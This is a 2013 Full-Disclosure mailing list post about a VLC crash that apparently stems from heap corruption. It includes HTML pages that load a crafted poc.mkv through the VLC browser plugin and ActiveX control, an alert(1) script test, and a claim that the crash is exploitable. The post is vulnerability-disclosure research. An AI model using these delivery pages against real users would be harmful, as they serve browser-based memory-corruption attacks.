Full Disclosure mailing list archives
Re: Full-Disclosure Digest, Vol 101, Issue 10
From: Sachin Shinde <sachinshinde1102 () gmail com>
Date: Wed, 10 Jul 2013 17:45:01 +0530
Hi,
Please, please, please try to understand the attack vectors, guys (please
think through all the cases before giving up).
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<html>
<head><title>Demo of VLC mozilla plugin</title></head>
<body>
<h1>Demo of VLC mozilla plugin - Example 1</h1>
<embed type="application/x-vlc-plugin"
name="video1"
autoplay="no" loop="yes" width="400" height="300"
target="poc.mkv" />
<br />
<a href="javascript:;" onclick='document.video1.play()'>Play video1</a>
<a href="javascript:;" onclick='document.video1.pause()'>Pause video1</a>
<a href="javascript:;" onclick='document.video1.stop()'>Stop video1</a>
<a href="javascript:;"
onclick='document.video1.fullscreen()'>Fullscreen</a>
</body>
</html>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<script>alert(1)</script>
<object
classid="clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921"
codebase="http://download.videolan.org/pub/videolan/vlc/last/win32/axvlc.cab"
id="vlc"
name="vlc"
class="vlcPlayer"
events="True">
<param name="Src" value="poc.mkv" />
<param name="ShowDisplay" value="True" />
<param name="AutoLoop" value="True" />
<param name="AutoPlay" value="True" />
</object>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Now the real problem is that plugins are executed outside of the browser process,
except in IE.
You can use my gist mediafuzz for fuzzing file formats in the browser (with
little modifications):
https://gist.github.com/cons0ul/2357771
Best,
Sachin Shinde
@cons0ul
On Wed, Jul 10, 2013 at 5:22 PM, Sachin Shinde
<sachinshinde1102 () gmail com> wrote:

> Finally someone dumping debug logs on FD :)
> Here's my debug logs:
> http://paste.ofcode.org/gcRAJB9ixqLKtxDBiyfvWv
> http://paste.ofcode.org/BtL95whhBFDPXiKPeF8ViJ
> The poc crashes vlc at different addresses (I have seen 3 different addresses so far).
> Looks like heap corruption, can be exploited if the vlc plugin crashes in the browser :)
>
> Cheers,
> Sachin Shinde
> @cons0ul
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
